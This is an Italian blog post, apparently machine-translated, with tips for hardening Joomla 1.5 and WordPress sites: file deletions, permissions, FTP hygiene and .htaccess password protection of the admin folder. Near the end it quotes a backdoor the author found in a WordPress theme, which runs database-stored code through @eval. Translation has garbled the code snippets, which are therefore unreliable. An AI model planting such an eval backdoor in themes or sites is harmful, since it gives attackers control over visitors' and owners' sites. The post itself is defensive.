    In realtà, per chiudere questa scappatoia (ma ancora non ho capito come usarlo per l'hacking), puoi semplicemente eliminare il seguente file:

    /components/com_user/models/reset.php È vero, dopo questo nessuno degli utenti registrati sul tuo sito potrà utilizzare la funzione di recupero password, ma per me questo non era importante, perché la registrazione non è stata prevista.

  2. Dicono anche che un trucco così utile, come l'aggiunta dell'indirizzo della pagina, consente anche agli autori di virus e ai cacciatori di proprietà altrui di raggiungere alcune aree sensibili del tuo sito e renderlo distruttivo, o in qualche altro modo abusarne. Questa cosa viene nuovamente rimossa modificando uno dei file del motore. /libraries/Joomla/application/module/helper.php

    Lì è necessario rimuovere due pezzi di codice o commentarli, racchiudendoli tra /* e */ (questo codice non verrà eseguito dall'interprete del linguaggio). Il primo frammento è così:

    If(count($risultato) == 0) ( if(JRequest::getBool("tp")) ( $risultato = JModuleHelper::getModule("mod_".$position); $risultato->titolo = $posizione; $risultato->contenuto = $posizione; $risultato->posizione = $posizione;

    E il secondo è così:

    If(JRequest::getBool("tp")) ( $attribs["stile"] .= " contorno"; )

    In realtà, dopo aver reimpostato la cache e provato a visualizzare le posizioni dei moduli nel tuo modello utilizzando questa costruzione:

    Https://sito/?tp=1

    Se non ha funzionato, spero che tu abbia chiuso questo buco.

  3. Molto spesso i siti vengono hackerati non dall'esterno, ma dall'interno. I trojan e i keygen sul tuo computer sanno cosa e dove cercare, quindi non memorizzare le password nei client FTP(c'è un'opzione da utilizzare per questo scopo). È considerato ancora più interessante disabilitare la possibilità di accedere al proprio sito tramite FTP e, invece, dove le informazioni trasmesse (comprese le password) sono crittografate, il che rende inutile l'intercettazione. Ad essere sincero, trascuro l'ultimo consiglio a causa della mia “oscurità”. C'è anche la possibilità di impostare l'accesso al tuo sito tramite FTP normale solo da un indirizzo IP specifico (il tuo computer), ma il mio provider Internet ha un IP dinamico (cambia entro un certo intervallo).
  4. Anche consigliare motore non superiori a quelli effettivamente necessari per il suo funzionamento. Infatti, senza pensarci troppo, l'ho impostato secondo il template: 755 per le cartelle e 644 per i file. Puoi fare tutto usando lo stesso Filezilla. Inoltre, questi diritti devono essere applicati non solo alle directory della cartella principale, ma anche a tutte le directory e i file che si trovano al loro interno.

    Ho impostato i permessi su 444 per i file nella cartella root e 705 per le directory tmp e logs Ovviamente avrei potuto fissarli più strettamente, ma non ho molta esperienza in questo e non c'era tempo perdere tempo in esperimenti. Inoltre, tutto ciò non scoraggerà seriamente gli hacker, perché ci sono cose che possono vanificare tutti i nostri sforzi. Per fare ciò, usa comandi come questo:

    Pertanto, per "concretizzare" completamente i file del motore Joomla 1.5 da hacking e intrusioni, è necessario vietare la modifica dei diritti di accesso a file e cartelle tramite PHP. Questo viene fatto nelle impostazioni del server, ma non so ancora come e dove. Se lo sai, per favore posta un link.

  5. Tutto quanto sopra è progettato per ridurre la probabilità che il tuo sito venga violato e penetrato da shell e altri malware. Tuttavia, le precauzioni prese non sono una garanzia, quindi sarebbe fantastico sul server (dove risiede il tuo sito Joomla 1.5). Ciò rimuoverà tutta la negatività dal male trapelato. Tuttavia, personalmente, ancora una volta, non l'ho ancora implementato per motivi di “oscurità”. Sarei grato per i collegamenti a materiali che spiegano questo processo.
  6. Molto spesso, i siti Web vengono danneggiati dopo aver ottenuto l'accesso al pannello amministrativo. È chiaro che è protetto da password, quindi utilizzando la forza bruta (ipotesi intelligente) molte password, anche apparentemente complesse, vengono violate in uno o due secondi. Ecco perché anche il pannello di amministrazione deve essere protetto ed è meglio farlo non utilizzando estensioni aggiuntive, ma utilizzando gli strumenti del server. Esistono diverse opzioni di protezione. Ad esempio, puoi modificare l'URL del pannello di amministrazione in un modo o nell'altro in modo che un hacker non possa iniziare i suoi sporchi affari.

    Un altro metodo di protezione, che verrà descritto in dettaglio di seguito, consiste nel creare un'ulteriore barriera sul percorso dell'aggressore (una persona vivente o uno script). Consiste nel proteggere con password la directory con i file admin (in Joomla questa è la cartella amministratore e in WordPress - wp-admin) utilizzando il server web. Si scopre che quando si accede al pannello di amministrazione, sarà necessario prima inserire login e password per accedere alla cartella, e solo successivamente login e password per accedere, appunto, al pannello di amministrazione del motore. Inoltre, rompendo la prima linea di difesa utilizzando metodi di forza bruta, il malware non creerà alcun carico aggiuntivo significativo sul server, il che è positivo.

  7. Un'altra nota molto importante, a mio avviso, per aumentare la sicurezza dei propri siti da attacchi di hacker e infezioni da virus è seguire la regola: un sito - un account di hosting. Sì, è più costoso, ma molto più sicuro. Se ospitati su un account, tutti i tuoi siti saranno immediatamente accessibili tramite FTP se il malware riesce ad accedere solo a uno di essi. Interrompono i siti automaticamente e non sarebbe ragionevole sperare che gli script non risalgano l'albero delle directory. Inoltre, è molto difficile trattare un gruppo di siti su un account di hosting, perché lavorando su un sito si perde di vista quello già guarito, che viene infettato allo stesso tempo.
  8. A proposito, possono rompersi non solo dal tuo sito, ma anche dal sito del tuo vicino hosting, se i proprietari non si sono presi la dovuta cura per escludere questa possibilità. Anche il pannello di hosting (come ad esempio) può essere violato, ma in ogni caso il numero di attacchi per colpa dell'hoster è trascurabile rispetto al numero di attacchi per disattenzione dei proprietari del sito.

Come proteggere l'area amministrativa del tuo sito web dagli attacchi hacker?

Voglio parlare in dettaglio del metodo di protezione che ho utilizzato io stesso di recente. Consiste in vietando l’accesso alle cartelle dove si trovano i file del pannello amministrativo del sito. Il divieto viene impostato utilizzando un meraviglioso file .htaccess, che, in sostanza, ti consente di controllare da remoto le impostazioni del server web su cui è installato il tuo sito. Allo stesso tempo, sa come farlo in modo selettivo.

Tutte le direttive scritte in .htaccess si applicheranno solo alla directory in cui si trova. Vuoi cambiare qualcosa nelle impostazioni dell'intero sito? Quindi posiziona .htaccess nella cartella principale. Bene, a noi interessano solo le impostazioni relative alla cartella con i file admin, quindi la posizioneremo lì. In Joomla questa sarà la cartella dell'amministratore, in WordPress - wp-admin.

Tuttavia, non possiamo cavarcela solo con .htaccess. Dovrai anche utilizzare .htpasswd, dove verranno archiviati il ​​login e la password per accedere a questa stessa cartella amministrativa. Inoltre, la password non verrà memorizzata in chiaro, ma come cifratura MD5. Non sarà possibile recuperare la password utilizzandola, ma quando si inserisce la combinazione corretta nel campo password, il server web calcolerà l'importo MD5 per questa combinazione e lo confronterà con quanto memorizzato in .htpasswd. Se i dati corrispondono, ti sarà consentito accedere all'area di amministrazione di Joomla o WordPress, altrimenti non ti sarà consentito.

Questo è tutto, non resta che dare vita al piano. Devi aggiungere alcune direttive a .htaccess. Sai quali? Non lo so. E in qualche modo dovrai convertire la password in una sequenza MD5. Problema. Tuttavia, ha una soluzione abbastanza semplice. Brave persone hanno organizzato un servizio online per generare contenuto per il file .htaccess e il file .htpasswd in base al nome utente e alla password che hai creato. È vero, dovrai anche specificare il percorso assoluto della cartella amministrativa, ma questo è banale.

Quindi, incontra il grande e il terribile generatore di protezione per il pannello di amministrazione del tuo sito. Capisco, vero? Ti vengono in mente, o meglio ancora, crei due combinazioni complesse di lettere, numeri e simboli su qualcosa, dopodiché le inserisci nei due campi superiori. Basta non dimenticare di scriverli o di inserirli in un gestore di password, altrimenti non sarai in grado di accedere all'area di amministrazione e dovrai ricominciare da capo tutto quanto descritto in questa parte.

Qui, ora. Conosci questo? Anche se non lo sai, non importa. Collegatevi al sito tramite FTP, create nella sua root un file con un nome qualsiasi (anche con il seguente url_path.php) e aggiungeteci questo semplice codice:

"; echo "Percorso completo dello script e il suo nome: ".$_SERVER["SCRIPT_FILENAME"]."
"; echo "Nome dello script: ".$_SERVER["NOME_SCRIPT"]; ?>

Poi vai sul browser e inserisci questo URL nella barra degli indirizzi (con il tuo dominio, ovviamente):

Https://sito/percorso_url.php

Di conseguenza, vedrai il percorso assoluto che ti interessava. Inseriscilo nel generatore di file .htaccess e .htpasswd sopra. Non dimenticare di aggiungere il nome dell'amministratore o della cartella wp-admin alla fine di questo percorso senza la barra finale. Questo è tutto, ora fai clic sul pulsante “Genera”.

E uno per uno, trasferisci i contenuti dei file .htaccess e .htpasswd direttamente su questi stessi file.

Spero che tu li abbia già creati nelle cartelle amministratore o wp-admin (a seconda del motore che usi)?

Bene, ora prova ad accedere al pannello di amministrazione. Viene visualizzata una finestra che ti chiede di inserire nome utente e password per il tuo server web? Viene visualizzato in modo diverso nei diversi browser, ma in Chrome appare così:

Se qualcosa non funziona, "fuma" il percorso assoluto di .htpasswd, scritto nel file .htaccess. In questo caso, correggilo manualmente durante la modifica del file. Questo è tutto quello che volevo dirti oggi. Se vuoi criticare o aggiungere qualcosa, fai pure.

Virus su WordPress?

Dopo aver scritto questo articolo, ho scoperto del malware sul mio blog (https://site) (o qualcosa che è stato installato aggirando la mia volontà). Volevo solo cambiare qualcosa nel codice e sono entrato in . In fondo, immediatamente prima del tag Body, sono stato colpito da una chiamata a una funzione che non mi era familiare (in base al nome, ma non ho trovato nulla di utile):

Il nome sembra essere sensato. È interessante notare che circa tre settimane prima ho scoperto per caso di avere una nuova tabella nei database di due dei miei blog WordPress (https://site e un altro). Il suo nome era semplicemente meraviglioso: wp-config. Cercare nuovamente questo nome su Google non ha prodotto nulla di utile, perché tutte le risposte erano correlate al file wp-config.php con lo stesso nome.

Questa tabella è cresciuta rapidamente di dimensioni (fino a cento megabyte su https://site) e al suo interno sono stati scritti gli indirizzi delle pagine del mio sito con vari parametri. Non capendo l'essenza di questo processo, ho semplicemente demolito questo tavolo e basta. A proposito, ho un altro blog su WordPress, ma lì non è stato osservato nulla di simile.

Bene, qui ho trovato un inserimento così "parlante" nell'argomento. Ho deciso di vedere se lì era stato aggiunto qualcosa di coerente con la riga sopra descritta nella parte inferiore del footer. Si è scoperto che è stato aggiunto. E così ordinatamente - né in alto, né in basso, ma la seconda (o terza) funzione inscritta dall'alto:

Funzione wp_custom_page_links_return() ( $option = get_option("wp_custom_page_links"); @eval($option); ) @eval(get_option("wp_brlinks"));

È qui che la meravigliosa "eval" attira la tua attenzione. Ciò che è degno di nota è che Aibolit (descritto sopra) ha trovato questo frammento sospetto, ma non ci sono ancora riuscito, perché questo script sospetta già che molte persone siano inaffidabili. Ho anche cercato su Google questo codice e ho trovato un post (sfortunatamente il dominio era ora bloccato per mancato pagamento) che descriveva un problema simile. Un mio amico ha fatto trapelare questa schifezza con un nuovo tema in cui era incorporato del codice di installazione.

Ho avuto argomenti su entrambi i blog infetti per molti anni. Probabilmente c'era qualche tipo di vulnerabilità nel motore o , di cui i malvagi hanno rapidamente approfittato (in streaming). In generale, controlla te stesso per tali inclusioni. La data di modifica dei file descritti è stata, a mio avviso, metà settembre di quest'anno.

Ti consiglio anche di guardare una selezione da 17 lezioni video sulla protezione dei siti Web su Joomla. Verranno riprodotte una dopo l'altra automaticamente e, se lo desideri, puoi passare alla lezione successiva utilizzando il pulsante corrispondente sul pannello del lettore o selezionare la lezione desiderata dal menu a discesa nell'angolo in alto a sinistra della finestra del lettore:

Buona visione!

Buona fortuna a te! A presto sulle pagine del blog del sito

Potresti essere interessato

Il sito Joomla ha iniziato a produrre una serie di errori come: Standard rigorosi: il metodo non statico JLoader::import () non dovrebbe essere chiamato staticamente in
Aggiornamento di Joomla all'ultima versione
Creazione di una mappa per un sito Joomla utilizzando il componente Xmap
Cos'è Joomla
Gruppi di utenti in Joomla, impostazioni di memorizzazione nella cache e problema dell'invio di posta dal sito
Componente K2 per la creazione di blog, cataloghi e portali su Joomla: funzionalità, installazione e russificazione
Moduli in Joomla: visualizzazione di posizione, impostazione e output, nonché assegnazione di suffissi di classe
Come aggiornare un sito Html statico ad uno dinamico su Joomla
Installazione di WordPress nei dettagli e nelle immagini, accesso all'area di amministrazione del WP e modifica della password
Plugin Joomla: TinyMCE, Load Module, Legacy e altri installati per impostazione predefinita